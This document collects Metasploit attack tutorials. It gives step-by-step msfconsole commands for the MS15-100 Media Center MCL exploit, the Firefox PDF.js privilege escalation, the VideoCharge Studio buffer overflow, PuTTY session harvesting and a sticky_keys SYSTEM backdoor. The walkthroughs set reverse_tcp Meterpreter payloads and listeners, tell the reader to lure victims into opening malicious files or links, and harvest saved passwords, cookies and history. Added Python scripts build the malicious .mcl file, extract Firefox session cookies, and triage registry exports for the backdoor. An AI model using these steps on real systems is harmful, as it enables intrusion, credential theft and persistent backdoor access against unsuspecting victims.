Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits a vulnerability in Windows Media Center. By supplying a UNC path in the *.mcl file, a remote file is automatically downloaded and run, which can result in arbitrary code execution.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit(ms15_100_mclexe) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms15_100_mclexe) > set lhost 192.168.1.7 (IP of Local Host)
msf exploit(ms15_100_mclexe) > set lport 443
msf exploit(ms15_100_mclexe) > exploit


The module writes the malicious msf.mcl file (under /root/.msf4/local/ by default), starts a share on the attacker's host and prints the UNC path at which the payload executable is served (file://192.168.1.7/aqxtlL/msf.exe here; the share name is random). Send msf.mcl to the victim. When it is opened in Windows Media Center, the embedded UNC path is fetched from the attacker's share and the executable is run, as shown in the page below.




Now type sessions -l to list the sessions opened when the victim opens the file.

Once a session has opened, type sysinfo to get system information, then shell to drop into the victim's command prompt.
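As an added example (not code from the page or from the Metasploit module), the script below shows what the generated .mcl actually contains and how a defender can triage such files. It builds the one-element <application run="..."/> document the module writes for the UNC path shown above, and flags any .mcl whose run= (executable to launch) or url= (web content) attribute points off-host; the sample documents are constructed, and the benign path is an assumption for contrast.

```python
"""Build and inspect Windows Media Center .mcl link files.

Added example: not code from the page or from the Metasploit module.
"""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse


def build_mcl(run_target: str) -> str:
    """Return a one-element .mcl document that launches run_target.

    <application run="..."/> is the layout the ms15_100_mclexe module writes;
    for the attack the target is a UNC path on a share the attacker controls.
    """
    app = ET.Element("application", {"run": run_target})
    return ET.tostring(app, encoding="unicode")


def is_remote_target(value: str) -> bool:
    """True if a run=/url= value would be fetched from another host."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):      # UNC: \\host\share\file
        return True
    parsed = urlparse(v)
    if parsed.scheme in ("http", "https", "ftp"):
        return True
    # file://host/share/x.exe is remote; file:///C:/x.exe (empty host) is local
    return parsed.scheme == "file" and bool(parsed.netloc)


def mcl_findings(mcl_text: str) -> list:
    """Return (attribute, value) pairs in an .mcl that point off-host.

    run= names the executable Media Center launches; url= (used by MCL for
    web-hosted content) is checked too. A benign .mcl normally points at a
    local program, so any remote target is worth a look.
    """
    root = ET.fromstring(mcl_text)
    findings = []
    for elem in root.iter():
        for attr in ("run", "url"):
            val = elem.get(attr)
            if val is not None and is_remote_target(val):
                findings.append((attr, val))
    return findings


# Constructed samples: the first mirrors what the module emits for the UNC
# path printed in the walkthrough, the second is an ordinary local launcher.
ATTACK_MCL = build_mcl(r"\\192.168.1.7\aqxtlL\msf.exe")
BENIGN_MCL = '<application run="C:\\Program Files\\Foo\\foo.exe" />'

if __name__ == "__main__":
    print(ATTACK_MCL)
    print("attack :", mcl_findings(ATTACK_MCL))
    print("benign :", mcl_findings(BENIGN_MCL))
```

Run the file directly to print the generated document and the findings for both samples; mcl_findings() can be pointed at any .mcl read from disk (or from a mail gateway quarantine) to spot the UNC-based variant this module produces.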

How to Hack Saved Sessions in PuTTY using Metasploit

This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session information from the registry. PuTTY is very configurable; some users may have configured saved sessions which can include a username, a private key file to use when authenticating, a host name, etc. If a private key is configured, an attempt will be made to download it and store it in loot. It will also record the SSH host keys that have been stored. These are hosts the user has previously connected to after accepting the host's SSH fingerprint, and they are therefore of particular interest if they are within scope of a penetration test.

Exploit Targets
PuTTY

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use post/windows/gather/enum_putty_saved_sessions
This is a post-exploitation module, so it takes no payload or lhost; it only needs the id of an existing Meterpreter session on the victim (see sessions -l).
msf post(enum_putty_saved_sessions) > set session 1
msf post(enum_putty_saved_sessions) > run


The module prints each saved session (host name, port, user name, private key file) and writes what it collects to the loot directory (~/.msf4/loot by default). Open that folder and view the session file to see the session information.

Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets
Firefox 35-36
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation
msf exploit(firefox_pdfjs_privilege_escalation) > set payload windows/meterpreter/reverse_tcp
msf exploit(firefox_pdfjs_privilege_escalation) > set lhost 192.168.0.121 (IP of Local Host)
msf exploit(firefox_pdfjs_privilege_escalation) > set srvhost 192.168.0.121
msf exploit(firefox_pdfjs_privilege_escalation) > set uripath /
msf exploit(firefox_pdfjs_privilege_escalation) > exploit


The module now serves the exploit at http://192.168.0.121:8080/ (srvhost on the default srvport 8080, uripath /); this is the URL to give to the victim.


Send the link to the victim via chat, email or any other social engineering technique.

When the victim opens the link (http://192.168.0.121:8080), the page shown below is displayed. The exploit fires only after the victim clicks anywhere on the page (the "click here" text).


Now a session will be opened as shown below.


If you want to gather the passwords the user has saved in Firefox, use the following commands. Note that the post/firefox/gather modules run privileged JavaScript inside the browser, so they need a session of type firefox (one obtained with a firefox/ payload such as firefox/shell_reverse_tcp); they do not run against a native Meterpreter session.
Now type use post/firefox/gather/passwords
msf post(passwords) > set session 1
msf post(passwords) > run

The module runs its privileged JavaScript in the browser and prints the loot path where the saved logins were written.


Open that file to read the user names and passwords saved in Firefox.


To see the Firefox history, run the module below.
Now type use post/firefox/gather/history
msf post(history) > set session 1
msf post(history) > run


After running this module, open the file at the loot path it prints; it lists the URLs the victim has visited.


To gather the browser cookies, run the module below.
Now type use post/firefox/gather/cookies
msf post(cookies) > set session 1
msf post(cookies) > run


The module writes all cookies to the loot path it prints. Open the folder and view the cookies file to see the cookie information.
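The three post/firefox/gather modules above pull history, cookies and logins out of the browser through privileged JavaScript. As an added example (not the page's or Metasploit's code), the script below reads the same history and cookie data offline from the profile's places.sqlite and cookies.sqlite, for instance from a copied profile directory. It assumes only the subset of the moz_places, moz_historyvisits and moz_cookies columns it queries, and builds constructed in-memory stand-ins for those files so it runs without a real profile. Saved logins are deliberately left out: logins.json is encrypted with NSS key material from key4.db, which is exactly why the Metasploit module decrypts them inside the browser instead.

```python
"""Read Firefox history and cookies straight from the profile databases.

Added example (not the page's or Metasploit's code): the post/firefox/gather
modules pull the same data through privileged JavaScript; this reads the
SQLite files offline, e.g. from a copied profile directory.
"""
import sqlite3
from datetime import datetime, timezone


def prtime_to_iso(prtime: int) -> str:
    """Firefox stores places timestamps as microseconds since the Unix epoch."""
    return datetime.fromtimestamp(prtime / 1_000_000, tz=timezone.utc).isoformat()


def firefox_history(places: sqlite3.Connection) -> list:
    """Return (last_visit_iso, visit_count, url, title) rows, newest first.

    Queries the moz_places / moz_historyvisits tables of places.sqlite.
    """
    rows = places.execute(
        "SELECT MAX(v.visit_date), p.visit_count, p.url, p.title "
        "FROM moz_places p JOIN moz_historyvisits v ON v.place_id = p.id "
        "GROUP BY p.id ORDER BY 1 DESC"
    ).fetchall()
    return [(prtime_to_iso(ts), n, url, title) for ts, n, url, title in rows]


def firefox_cookies(cookies: sqlite3.Connection, auth_only: bool = False) -> list:
    """Return cookie dicts from cookies.sqlite (moz_cookies).

    With auth_only=True keep only cookies marked both Secure and HttpOnly,
    which is how session cookies of interest to an attacker are usually set.
    """
    rows = cookies.execute(
        "SELECT host, name, value, path, expiry, isSecure, isHttpOnly "
        "FROM moz_cookies ORDER BY host, name"
    ).fetchall()
    out = []
    for host, name, value, path, expiry, secure, httponly in rows:
        if auth_only and not (secure and httponly):
            continue
        out.append({"host": host, "name": name, "value": value, "path": path,
                    "expires": datetime.fromtimestamp(expiry, tz=timezone.utc).isoformat(),
                    "secure": bool(secure), "httponly": bool(httponly)})
    return out


def build_sample_profile():
    """Constructed in-memory stand-ins for places.sqlite and cookies.sqlite.

    Only the columns used above are created; real profiles have many more.
    """
    places = sqlite3.connect(":memory:")
    places.executescript("""
        CREATE TABLE moz_places(id INTEGER PRIMARY KEY, url TEXT, title TEXT, visit_count INTEGER);
        CREATE TABLE moz_historyvisits(id INTEGER PRIMARY KEY, place_id INTEGER, visit_date INTEGER);
    """)
    places.executemany("INSERT INTO moz_places VALUES (?,?,?,?)", [
        (1, "https://intranet.example/login", "Intranet login", 3),
        (2, "https://mail.example/inbox", "Inbox", 1),
    ])
    places.executemany("INSERT INTO moz_historyvisits VALUES (?,?,?)", [
        (1, 1, 1_700_000_000_000_000),   # 2023-11-14T22:13:20Z in PRTime
        (2, 1, 1_700_000_600_000_000),
        (3, 2, 1_700_000_300_000_000),
    ])
    cookies = sqlite3.connect(":memory:")
    cookies.executescript("""
        CREATE TABLE moz_cookies(id INTEGER PRIMARY KEY, host TEXT, name TEXT, value TEXT,
                                 path TEXT, expiry INTEGER, isSecure INTEGER, isHttpOnly INTEGER);
    """)
    cookies.executemany("INSERT INTO moz_cookies VALUES (?,?,?,?,?,?,?,?)", [
        (1, ".intranet.example", "SESSIONID", "a1b2c3d4", "/", 1_700_086_400, 1, 1),
        (2, ".mail.example", "prefs", "lang=en", "/", 1_700_086_400, 0, 0),
    ])
    return places, cookies


if __name__ == "__main__":
    # For a real profile: sqlite3.connect("file:/path/places.sqlite?mode=ro", uri=True)
    # after copying the files, since Firefox keeps them locked while running.
    places, cookies = build_sample_profile()
    for row in firefox_history(places):
        print("history:", row)
    for c in firefox_cookies(cookies, auth_only=True):
        print("auth cookie:", c["host"], c["name"], c["value"])
```

The visit timestamps are PRTime (microseconds), while cookie expiry is plain seconds; mixing the two up is the usual mistake when reading these files by hand.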

Windows 7 Sticky Key Hack Attack using Metasploit


Today we will learn how to plant a backdoor on a compromised Windows system that hands us a SYSTEM command prompt straight from the login screen, using the sticky_keys post module.
Table of Content:
·        Introduction to sticky_keys module
·        Achieve Meterpreter on Remote System
·        Using sticky_keys module

Requirements:
·        Attacker: Kali Linux
·        Target: Windows 7
Introduction to sticky_keys module
This module makes it possible to apply the 'sticky keys' hack to a session with the appropriate rights. The hack provides a way to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog.
The module modifies the Debugger registry setting (under Image File Execution Options) for certain executables. The module options allow this hack to be applied to:
·        SETHC (sethc.exe is invoked when SHIFT is pressed 5 times)
·        UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U)
·        OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard)
·        DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P).
The hack can be added using the ADD action and removed with the REMOVE action. Custom payloads and binaries can be run as part of this hack, but they must be uploaded to the target manually before running the module. By default, if the module is run without changing any parameters, a SYSTEM command prompt is installed using the registry method.
Achieve Meterpreter on Remote System

Open a Kali Linux terminal and type msfconsole to load the Metasploit framework. We first need to compromise the victim's machine and obtain a session, either Meterpreter or shell; to do so, read our previous article from here.
Using sticky_keys module
After getting Meterpreter on the remote system, it is time to use the post-exploitation module. It cannot be run from inside the Meterpreter shell, so use the background command (or the Ctrl+Z shortcut) to put the session in the background. Then follow the steps shown in the image to use the sticky_keys post-exploitation module.
use post/windows/manage/sticky_keys
set session 5
exploit

The module edits the registry on the remote system: it sets the Debugger value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe to cmd.exe. From then on, whenever sethc.exe is invoked (SHIFT pressed five times), Windows launches cmd.exe instead of the sticky keys prompt. The useful property of sticky keys is that they can be invoked on the login screen without entering a password, and there the process runs as SYSTEM, so we get a SYSTEM command prompt, as shown in the image below.
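Both the PuTTY saved-sessions module above and the sticky_keys module come down to specific registry keys, so one offline triage script serves both. As an added example (not the page's or Metasploit's code), the script below parses a .reg export (as produced by reg export HKCU\Software\SimonTatham\PuTTY putty.reg and the equivalent for the Image File Execution Options key), lists the PuTTY saved sessions and accepted host keys that enum_putty_saved_sessions reports, and flags Debugger values on the four accessibility binaries that sticky_keys targets. The sample export, its host names, user and key path are constructed; the key paths and value names are the real ones PuTTY and Windows use.

```python
"""Offline triage of a Windows .reg export for the two artefacts above.

Added example, not the page's or Metasploit's code: it extracts PuTTY saved
sessions/host keys (what enum_putty_saved_sessions reports) and flags
Image File Execution Options debugger hijacks of the accessibility binaries
(what sticky_keys plants). The same logic works on a live host via winreg.
"""
import re
from urllib.parse import unquote

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"=(.*)$')

PUTTY_SESSIONS = "HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\Sessions\\"
PUTTY_HOSTKEYS = "HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\SshHostKeys"
IFEO = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
        "Image File Execution Options\\")
# The four targets the sticky_keys module offers (SETHC, UTILMAN, OSK, DISP).
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "displayswitch.exe"}


def parse_reg(text: str) -> dict:
    """Parse a .reg export into {key_path: {value_name: value}}.

    Covers the value kinds these artefacts use: quoted strings (backslashes
    are doubled in .reg files) and dword:XXXXXXXX integers.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            name, rhs = m.group(1), m.group(2)
            if rhs.startswith("dword:"):
                keys[current][name] = int(rhs[6:], 16)
            elif rhs.startswith('"') and rhs.endswith('"'):
                keys[current][name] = rhs[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return keys


def putty_sessions(keys: dict) -> list:
    """Saved-session fields of interest: where, as whom, and with which key."""
    out = []
    for path, values in keys.items():
        if path.startswith(PUTTY_SESSIONS):
            out.append({
                "name": unquote(path[len(PUTTY_SESSIONS):]),  # PuTTY URL-encodes names
                "host": values.get("HostName", ""),
                "port": values.get("PortNumber", 22),
                "user": values.get("UserName", ""),
                "key_file": values.get("PublicKeyFile", ""),
            })
    return out


def putty_host_keys(keys: dict) -> list:
    """(algorithm, port, host) for every host key the user has accepted."""
    pairs = []
    for name in keys.get(PUTTY_HOSTKEYS, {}):
        alg, _, rest = name.partition("@")          # e.g. rsa2@22:jump.corp.example
        port, _, host = rest.partition(":")
        pairs.append((alg, port, host))
    return pairs


def ifeo_hijacks(keys: dict) -> list:
    """(image, debugger) for Debugger values on the accessibility binaries.

    A Debugger entry on other images (e.g. a developer's notepad.exe) can be
    legitimate; on these four it almost never is.
    """
    hits = []
    for path, values in keys.items():
        if path.startswith(IFEO) and "Debugger" in values:
            image = path[len(IFEO):].lower()
            if image in ACCESSIBILITY_BINARIES:
                hits.append((image, values["Debugger"]))
    return hits


# Constructed export: one PuTTY session, one cached host key, one IFEO entry
# of the kind sticky_keys sets and one unrelated developer debugger.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\prod%20jump]
"HostName"="jump.corp.example"
"PortNumber"=dword:0000002a
"UserName"="svc_deploy"
"PublicKeyFile"="C:\\Users\\alice\\keys\\deploy.ppk"

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]
"rsa2@22:jump.corp.example"="0x10001,0xc3a1f0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\dbg.exe"
'''

if __name__ == "__main__":
    keys = parse_reg(SAMPLE_REG)
    for s in putty_sessions(keys):
        print("PuTTY session:", s)
    for hk in putty_host_keys(keys):
        print("accepted host key:", hk)
    for image, dbg in ifeo_hijacks(keys):
        print(f"IFEO hijack: {image} -> {dbg}")
```

Real exports from reg export are written as UTF-16 with a byte-order mark, so open them with encoding="utf-16" before passing the text to parse_reg(). On the defensive side, an IFEO Debugger value on sethc.exe, utilman.exe, osk.exe or DisplaySwitch.exe is the artefact to alert on; the module's REMOVE action deletes it again.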

Hack Remote Windows PC using Video Charge Studio Buffer Overflow (SEH)

This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when processing a specially crafted .VSC file. This vulnerability could be exploited by a remote attacker to execute arbitrary code on the target machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.

Exploit Targets
VideoCharge Studio 2.12.3.685

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole.


Now type use exploit/windows/fileformat/videocharge_studio
msf exploit(videocharge_studio) > set payload windows/meterpreter/reverse_tcp
msf exploit(videocharge_studio) > set lhost 192.168.1.7 (IP of Local Host)
msf exploit(videocharge_studio) > exploit


After the malicious .vsc file is generated, it is stored on your local machine at
/root/.msf4/local/msf.vsc


Now set up a listener to handle the reverse connection the victim's machine will send when the exploit executes; the payload and lhost must match what was used to build the file.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.7
exploit

Now send msf.vsc to the victim. As soon as they download and open it in VideoCharge Studio, a Meterpreter session opens on the victim's computer.